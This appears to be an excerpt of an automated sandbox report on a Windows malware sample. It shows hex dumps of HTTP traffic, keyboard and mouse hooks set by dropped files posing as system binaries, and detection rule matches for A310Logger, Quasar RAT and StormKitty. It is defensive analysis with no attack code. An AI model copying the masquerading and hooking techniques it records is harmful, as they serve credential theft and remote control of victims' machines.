67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 
77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Fri, 05 Aug 2022 07:10:59 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 
77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Fri, 05 Aug 2022 07:11:08 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 
77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Fri, 05 Aug 2022 07:11:10 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 
77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                Source: unknownHTTPS traffic detected: 51.81.194.202:443 -> 192.168.2.4:49766 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exeWindows user hook set: 916 mouse C:\Windows\SYSTEM32\MSVBVM60.DLL
                Source: C:\Users\user\AppData\Local\icsys.icn.exeWindows user hook set: 1792 mouse C:\Windows\SYSTEM32\MSVBVM60.DLL
                Source: C:\Windows\System\explorer.exeWindows user hook set: 5244 mouse C:\Windows\SYSTEM32\MSVBVM60.DLL
                Source: C:\Windows\System\explorer.exeWindows user hook set: 0 keyboard low level c:\windows\system\explorer.exe
                Source: C:\Windows\System\explorer.exeWindows user hook set: 0 mouse low level c:\windows\system\explorer.exe
                Source: C:\Windows\System\spoolsv.exeWindows user hook set: 3472 mouse C:\Windows\SYSTEM32\MSVBVM60.DLL
                Source: C:\Windows\System\svchost.exeWindows user hook set: 784 mouse C:\Windows\SYSTEM32\MSVBVM60.DLL
                Source: C:\Windows\System\spoolsv.exeWindows user hook set: 4736 mouse C:\Windows\SYSTEM32\MSVBVM60.DLL
                Source: C:\Windows\System\explorer.exeWindows user hook set: 5540 mouse C:\Windows\SYSTEM32\MSVBVM60.DLL
                Source: C:\Windows\System\svchost.exeWindows user hook set: 6312 mouse C:\Windows\SYSTEM32\MSVBVM60.DLL
                Source: Lg3gn9y1Cj.exe, 00000000.00000002.270751235.000000000075A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                Source: C:\Windows\System\explorer.exeWindows user hook set: 0 mouse low level c:\windows\system\explorer.exe

                System Summary

                Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
                Source: Lg3gn9y1Cj.exe, type: SAMPLEMatched rule: Detects A310Logger Author: ditekSHen
                Source: 1.0.lg3gn9y1cj.exe .400000.0.unpack, type: UNPACKEDPEMatched rule: Detects A310Logger Author: ditekSHen
                Source: 1.2.lg3gn9y1cj.exe .2b40000.1.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
                Source: 1.2.lg3gn9y1cj.exe .2b40000.1.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
                Source: 1.2.lg3gn9y1cj.exe .2b40000.1.unpack, type: UNPACKEDPEMatched rule: Detects A310Logger Author: ditekSHen
                Source: 1.2.lg3gn9y1cj.exe .400000.0.unpack, type: UNPACKEDPEMatched rule: Detects A310Logger Author: ditekSHen
                Source: 2.0.AppLaunch.exe.5320000.0.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
                Source: 2.0.AppLaunch.exe.5320000.0.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
                Source: 2.0.AppLaunch.exe.5320000.0.unpack, type: UNPACKEDPEMatched rule: Detects A310Logger Author: ditekSHen
                Source: 00000002.00000000.265995360.0000000005322000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                Source: 00000001.00000002.535235845.0000000002B42000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                Source: 00000001.00000003.266417604.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                Source: C:\Users\user\Desktop\lg3gn9y1cj.exe , type: DROPPEDMatched rule: Detects A310Logger Author: ditekSHen
                Source: Lg3gn9y1Cj.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: icsys.icn.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: explorer.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: spoolsv.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: mrsys.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: svchost.exe.7.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: stsys.exe.8.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exeCode function: 0_2_0041F8300_2_0041F830
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exeCode function: 0_2_004161300_2_00416130
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exeCode function: 0_2_00422F500_2_00422F50
                Source: C:\Users\user\Desktop\lg3gn9y1cj.exe Code function: 1_2_004019AC1_2_004019AC
                Source: lg3gn9y1cj.exe .0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: C:\Windows\System\explorer.exeSection loaded: wininet.dll
                Source: C:\Windows\System\explorer.exeSection loaded: tokenbinding.dll
                Source: C:\Windows\System\svchost.exeSection loaded: netapi32.dll
                Source: C:\Windows\System\svchost.exeSection loaded: srvcli.dll
                Source: C:\Windows\System\svchost.exeSection loaded: drprov.dll
                Source: C:\Windows\System\svchost.exeSection loaded: ntlanman.dll
                Source: C:\Windows\System\svchost.exeSection loaded: davclnt.dll
                Source: C:\Windows\System\svchost.exeSection loaded: davhlpr.dll
                Source: C:\Windows\System\svchost.exeSection loaded: cscapi.dll
                Source: C:\Windows\System\svchost.exeSection loaded: browcli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
                Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\lg3gn9y1cj.exe 8A1902D9C0DBE388B28EF5A9C8EC4C0F1802FC6CCD43471EA337DCB3D71C81D4
                Source: Lg3gn9y1Cj.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: Lg3gn9y1Cj.exe, type: SAMPLEMatched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
                Source: 1.0.lg3gn9y1cj.exe .400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
                Source: 1.2.lg3gn9y1cj.exe .2b40000.1.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 1.2.lg3gn9y1cj.exe .2b40000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                Source: 1.2.lg3gn9y1cj.exe .2b40000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
                Source: 1.2.lg3gn9y1cj.exe .400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
                Source: 2.0.AppLaunch.exe.5320000.0.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 2.0.AppLaunch.exe.5320000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                Source: 2.0.AppLaunch.exe.5320000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
                Source: 00000002.00000000.265995360.0000000005322000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 00000001.00000002.535235845.0000000002B42000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 00000001.00000003.266417604.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: C:\Users\user\Desktop\lg3gn9y1cj.exe , type: DROPPEDMatched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
                Source: C:\Users\user\AppData\Local\icsys.icn.exeFile deleted: C:\Windows\System\explorer.exe
                Source: C:\Users\user\AppData\Local\icsys.icn.exeFile created: c:\windows\system\explorer.exe
                Source: C:\Users\user\Desktop\lg3gn9y1cj.exe Code function: String function: 004017F0 appears 49 times
                Source: Lg3gn9y1Cj.exe, 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWin.exe vs Lg3gn9y1Cj.exe
